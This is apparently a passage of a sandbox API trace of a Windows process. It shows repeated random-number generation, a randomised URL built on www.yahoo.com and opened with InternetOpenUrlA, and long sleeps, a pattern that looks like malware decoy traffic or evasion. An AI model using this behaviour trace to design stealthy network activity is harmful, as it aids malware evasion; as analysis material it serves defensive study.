(dwMilliseconds=0x11d39) [0174.730] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.730] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0174.730] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.730] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0174.730] GetProcessHeap () returned 0x440000 [0174.730] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x33) returned 0x4f4f70 [0174.730] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.731] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0174.731] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.731] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4f4f71, cbBuffer=0x18, dwFlags=0x2 | out: pbBuffer=0x4f4f71) returned 0x0 [0174.731] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.731] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.731] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.732] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.732] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.732] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.732] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.732] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.732] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.732] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.732] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.732] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.733] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.733] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.733] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.733] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.733] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.733] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.733] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.733] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.734] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.734] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.734] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.734] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.734] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.734] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.734] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.734] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.734] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.735] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.735] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.735] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.735] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.735] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.735] GetProcessHeap () returned 0x440000 [0174.735] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x4726f0 [0174.735] lstrcpyA (in: lpString1=0x4726f0, lpString2="ðßOås://www.yahoo.com" | out: lpString1="ðßOås://www.yahoo.com") returned="ðßOås://www.yahoo.com" [0174.735] lstrcatA (in: lpString1="ðßOås://www.yahoo.com", lpString2="/Ekl852qDv9i1hw3g10hp3ip/" | out: lpString1="ðßOås://www.yahoo.com/Ekl852qDv9i1hw3g10hp3ip/") returned="ðßOås://www.yahoo.com/Ekl852qDv9i1hw3g10hp3ip/" [0174.736] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0174.736] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="ðßOås://www.yahoo.com/Ekl852qDv9i1hw3g10hp3ip/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0174.736] GetProcessHeap () returned 0x440000 [0174.736] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4726f0 | out: hHeap=0x440000) returned 1 [0174.736] GetProcessHeap () returned 0x440000 [0174.736] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4f4f70 | out: hHeap=0x440000) returned 1 [0174.736] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0174.736] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0174.736] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.737] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0174.737] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0174.737] Sleep (dwMilliseconds=0x15f44) [0174.927] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.927] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0174.927] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.927] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0174.927] GetProcessHeap () returned 0x440000 [0174.927] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x95) returned 0x3a17480 [0174.927] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.927] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0174.928] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.928] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a17481, cbBuffer=0x26, dwFlags=0x2 | out: pbBuffer=0x3a17481) returned 0x0 [0174.928] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.928] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.928] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.928] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.928] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.928] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.929] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.929] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.929] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.929] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.929] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.929] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.929] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.929] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.930] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.930] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.930] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.930] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.930] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.930] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.930] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.931] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.931] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.931] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.931] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.931] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.931] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.931] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.931] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.931] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.932] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.932] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.932] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.932] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.933] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.933] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.933] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.933] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.933] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.933] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.933] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.933] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.934] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.934] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.934] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.934] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.934] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.934] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0174.934] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.934] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.934] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.934] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.935] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.935] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0174.935] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.935] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0174.935] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.935] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a174a7, cbBuffer=0x21, dwFlags=0x2 | out: pbBuffer=0x3a174a7) returned 0x0 [0174.935] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.935] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.936] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.936] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.936] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.936] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.936] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.936] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.936] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.936] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.936] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.936] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.937] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.937] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.937] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.937] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.937] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.937] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.937] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.937] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.938] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.938] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.938] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.938] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.938] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.938] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.938] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.938] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.938] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.939] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.939] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.939] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.939] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.939] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.939] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.071] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0175.071] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.071] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.071] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.071] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.071] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.071] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0175.072] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.072] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0175.072] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.072] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.072] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.072] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.072] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.072] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.073] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.073] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0175.073] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.073] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a174c8, cbBuffer=0x1c, dwFlags=0x2 | out: pbBuffer=0x3a174c8) returned 0x0 [0175.073] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.073] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0175.073] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.073] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.073] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.074] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0175.074] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.074] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0175.074] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.074] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0175.074] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.074] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.074] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.074] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: 